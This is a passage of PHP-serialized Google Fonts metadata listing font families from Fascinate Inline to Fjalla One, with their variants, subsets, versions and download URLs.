Inline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/fascinateinline/v22/jVyR7mzzB3zc-jp6QCAu60poNqIy1g3CfRXxWZQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:388;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Faster One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/fasterone/v17/H4ciBXCHmdfClFb-vWhfyLuShq63czE.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:389;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Fasthand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/fasthand/v26/0yb9GDohyKTYn_ZEESkuYkw2rQg1.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:390;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Fauna One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/faunaone/v13/wlpzgwTPBVpjpCuwkuEx2UxLYClOCg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:391;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Faustina\";s:8:\"variants\";a:12:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:9:\"300italic\";i:7;s:6:\"italic\";i:8;s:9:\"500italic\";i:9;s:9:\"600italic\";i:10;s:9:\"700italic\";i:11;s:9:\"800italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"300\";s:90:\"http://fonts.gstatic.com/s/faustina/v16/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHls3IEvGVWWe8tbEg.ttf\";s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/faustina/v16/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlsgoEvGVWWe8tbEg.ttf\";s:3:\"500\";s:90:\"http://fonts.gstatic.com/s/faustina/v16/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlssIEvGVWWe8tbEg.ttf\";s:3:\"600\";s:90:\"http://fonts.gstatic.com/s/faustina/v16/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlsXIYvGVWWe8tbEg.ttf\";s:3:\"700\";s:90:\"http://fonts.gstatic.com/s/faustina/v16/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlsZYYvGVWWe8tbEg.ttf\";s:3:\"800\";s:90:\"http://fonts.gstatic.com/s/faustina/v16/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlsAoYvGVWWe8tbEg.ttf\";s:9:\"300italic\";s:92:\"http://fonts.gstatic.com/s/faustina/v16/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsKZWl-SWc5LEnoF.ttf\";s:6:\"italic\";s:92:\"http://fonts.gstatic.com/s/faustina/v16/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsLHWl-SWc5LEnoF.ttf\";s:9:\"500italic\";s:92:\"http://fonts.gstatic.com/s/faustina/v16/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsL1Wl-SWc5LEnoF.ttf\";s:9:\"600italic\";s:92:\"http://fonts.gstatic.com/s/faustina/v16/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsIZXV-SWc5LEnoF.ttf\";s:9:\"700italic\";s:92:\"http://fonts.gstatic.com/s/faustina/v16/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsIgXV-SWc5LEnoF.ttf\";s:9:\"800italic\";s:92:\"http://fonts.gstatic.com/s/faustina/v16/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsJHXV-SWc5LEnoF.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:392;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Federant\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/federant/v25/2sDdZGNfip_eirT0_U0jRUG0AqUc.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:393;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Federo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/federo/v19/iJWFBX-cbD_ETsbmjVOe2WTG7Q.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:394;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Felipa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/felipa/v19/FwZa7-owz1Eu4F_wSNSEwM2zpA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:395;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Fenix\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/fenix/v20/XoHo2YL_S7-g5ostKzAFvs8o.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:396;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Festive\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/festive/v7/cY9Ffj6KX1xcoDWhFtfgy9HTkak.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:397;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Figtree\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"300\";s:86:\"http://fonts.gstatic.com/s/figtree/v1/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_chQF5ewkEU4HTy.ttf\";s:7:\"regular\";s:86:\"http://fonts.gstatic.com/s/figtree/v1/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_d_QF5ewkEU4HTy.ttf\";s:3:\"500\";s:86:\"http://fonts.gstatic.com/s/figtree/v1/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_dNQF5ewkEU4HTy.ttf\";s:3:\"600\";s:86:\"http://fonts.gstatic.com/s/figtree/v1/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_ehR15ewkEU4HTy.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/figtree/v1/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_eYR15ewkEU4HTy.ttf\";s:3:\"800\";s:86:\"http://fonts.gstatic.com/s/figtree/v1/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_f_R15ewkEU4HTy.ttf\";s:3:\"900\";s:86:\"http://fonts.gstatic.com/s/figtree/v1/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_fWR15ewkEU4HTy.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:398;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Finger Paint\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/fingerpaint/v15/0QInMXVJ-o-oRn_7dron8YWO85bS8ANesw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:399;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Finlandica\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-06-28\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/finlandica/v3/-nFsOGk-8vAc7lEtg0aSyZCty9GSsPBE19A7rEjx9i5ss3a3.ttf\";s:3:\"500\";s:93:\"http://fonts.gstatic.com/s/finlandica/v3/-nFsOGk-8vAc7lEtg0aSyZCty9GSsPBE19AJrEjx9i5ss3a3.ttf\";s:3:\"600\";s:93:\"http://fonts.gstatic.com/s/finlandica/v3/-nFsOGk-8vAc7lEtg0aSyZCty9GSsPBE19Dlq0jx9i5ss3a3.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/finlandica/v3/-nFsOGk-8vAc7lEtg0aSyZCty9GSsPBE19Dcq0jx9i5ss3a3.ttf\";s:6:\"italic\";s:96:\"http://fonts.gstatic.com/s/finlandica/v3/-nFuOGk-8vAc7lEtg0aS45mfNAn722rq0MXz76Cy_CpOtma3uNQ.ttf\";s:9:\"500italic\";s:96:\"http://fonts.gstatic.com/s/finlandica/v3/-nFuOGk-8vAc7lEtg0aS45mfNAn722rq0MXz75Ky_CpOtma3uNQ.ttf\";s:9:\"600italic\";s:96:\"http://fonts.gstatic.com/s/finlandica/v3/-nFuOGk-8vAc7lEtg0aS45mfNAn722rq0MXz7361_CpOtma3uNQ.ttf\";s:9:\"700italic\";s:96:\"http://fonts.gstatic.com/s/finlandica/v3/-nFuOGk-8vAc7lEtg0aS45mfNAn722rq0MXz70e1_CpOtma3uNQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:400;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Fira Code\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:91:\"http://fonts.gstatic.com/s/firacode/v21/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_GNsFVfxN87gsj0.ttf\";s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/firacode/v21/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_D1sFVfxN87gsj0.ttf\";s:3:\"500\";s:91:\"http://fonts.gstatic.com/s/firacode/v21/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_A9sFVfxN87gsj0.ttf\";s:3:\"600\";s:91:\"http://fonts.gstatic.com/s/firacode/v21/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_ONrFVfxN87gsj0.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/firacode/v21/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_NprFVfxN87gsj0.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:401;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Fira Mono\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"700\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/firamono/v14/N0bX2SlFPv1weGeLZDtQIfTTkdbJYA.ttf\";s:3:\"500\";s:78:\"http://fonts.gstatic.com/s/firamono/v14/N0bS2SlFPv1weGeLZDto1d33mf3VaZBRBQ.ttf\";s:3:\"700\";s:78:\"http://fonts.gstatic.com/s/firamono/v14/N0bS2SlFPv1weGeLZDtondv3mf3VaZBRBQ.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:402;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Fira Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:76:\"http://fonts.gstatic.com/s/firasans/v16/va9C4kDNxMZdWfMOD5Vn9IjOazP3dUTP.ttf\";s:9:\"100italic\";s:79:\"http://fonts.gstatic.com/s/firasans/v16/va9A4kDNxMZdWfMOD5VvkrCqYTfVcFTPj0s.ttf\";s:3:\"200\";s:78:\"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnWKnuQR37fF3Wlg.ttf\";s:9:\"200italic\";s:80:\"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrAGQBf_XljGllLX.ttf\";s:3:\"300\";s:78:\"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnPKruQR37fF3Wlg.ttf\";s:9:\"300italic\";s:80:\"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrBiQxf_XljGllLX.ttf\";s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/firasans/v16/va9E4kDNxMZdWfMOD5VfkILKSTbndQ.ttf\";s:6:\"italic\";s:76:\"http://fonts.gstatic.com/s/firasans/v16/va9C4kDNxMZdWfMOD5VvkojOazP3dUTP.ttf\";s:3:\"500\";s:78:\"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnZKvuQR37fF3Wlg.ttf\";s:9:\"500italic\";s:80:\"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrA6Qhf_XljGllLX.ttf\";s:3:\"600\";s:78:\"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnSKzuQR37fF3Wlg.ttf\";s:9:\"600italic\";s:80:\"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrAWRRf_XljGllLX.ttf\";s:3:\"700\";s:78:\"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnLK3uQR37fF3Wlg.ttf\";s:9:\"700italic\";s:80:\"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrByRBf_XljGllLX.ttf\";s:3:\"800\";s:78:\"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnMK7uQR37fF3Wlg.ttf\";s:9:\"800italic\";s:80:\"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrBuRxf_XljGllLX.ttf\";s:3:\"900\";s:78:\"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnFK_uQR37fF3Wlg.ttf\";s:9:\"900italic\";s:80:\"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrBKRhf_XljGllLX.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:403;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Fira Sans Condensed\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:99:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOjEADFm8hSaQTFG18FErVhsC9x-tarWZXtqOlQfx9CjA.ttf\";s:9:\"100italic\";s:101:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOtEADFm8hSaQTFG18FErVhsC9x-tarUfPVzONUXRpSjJcu.ttf\";s:3:\"200\";s:100:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWTnMiMN-cxZblY4.ttf\";s:9:\"200italic\";s:103:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVYMJ0dzRehY43EA.ttf\";s:3:\"300\";s:100:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWV3PiMN-cxZblY4.ttf\";s:9:\"300italic\";s:103:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVBMF0dzRehY43EA.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOhEADFm8hSaQTFG18FErVhsC9x-tarYfHnrMtVbx8.ttf\";s:6:\"italic\";s:99:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOjEADFm8hSaQTFG18FErVhsC9x-tarUfPtqOlQfx9CjA.ttf\";s:3:\"500\";s:100:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWQXOiMN-cxZblY4.ttf\";s:9:\"500italic\";s:103:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVXMB0dzRehY43EA.ttf\";s:3:\"600\";s:100:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWSnJiMN-cxZblY4.ttf\";s:9:\"600italic\";s:103:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVcMd0dzRehY43EA.ttf\";s:3:\"700\";s:100:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWU3IiMN-cxZblY4.ttf\";s:9:\"700italic\";s:103:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVFMZ0dzRehY43EA.ttf\";s:3:\"800\";s:100:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWVHLiMN-cxZblY4.ttf\";s:9:\"800italic\";s:103:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVCMV0dzRehY43EA.ttf\";s:3:\"900\";s:100:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWXXKiMN-cxZblY4.ttf\";s:9:\"900italic\";s:103:\"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVLMR0dzRehY43EA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:404;O:8:\"stdClass\":8:{s:6:\"family\";s:25:\"Fira Sans Extra Condensed\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:112:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPMcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3Zyuv1WarE9ncg.ttf\";s:9:\"100italic\";s:114:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPOcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqW21-ejkp3cn22.ttf\";s:3:\"200\";s:113:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3TCPn3-0oEZ-a2Q.ttf\";s:9:\"200italic\";s:116:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWd36-pGR7e2SvJQ.ttf\";s:3:\"300\";s:113:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3VSMn3-0oEZ-a2Q.ttf\";s:9:\"300italic\";s:116:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWE32-pGR7e2SvJQ.ttf\";s:7:\"regular\";s:109:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPKcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda5fiku3efvE8.ttf\";s:6:\"italic\";s:112:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPMcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fquv1WarE9ncg.ttf\";s:3:\"500\";s:113:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3QyNn3-0oEZ-a2Q.ttf\";s:9:\"500italic\";s:116:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWS3y-pGR7e2SvJQ.ttf\";s:3:\"600\";s:113:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3SCKn3-0oEZ-a2Q.ttf\";s:9:\"600italic\";s:116:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWZ3u-pGR7e2SvJQ.ttf\";s:3:\"700\";s:113:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3USLn3-0oEZ-a2Q.ttf\";s:9:\"700italic\";s:116:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWA3q-pGR7e2SvJQ.ttf\";s:3:\"800\";s:113:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3ViIn3-0oEZ-a2Q.ttf\";s:9:\"800italic\";s:116:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWH3m-pGR7e2SvJQ.ttf\";s:3:\"900\";s:113:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3XyJn3-0oEZ-a2Q.ttf\";s:9:\"900italic\";s:116:\"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWO3i-pGR7e2SvJQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:405;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Fjalla One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/fjallaone/v13/Yq6R-LCAWCX3-6Ky7FAFnOZwkxgtUb8.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:406;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Fjord 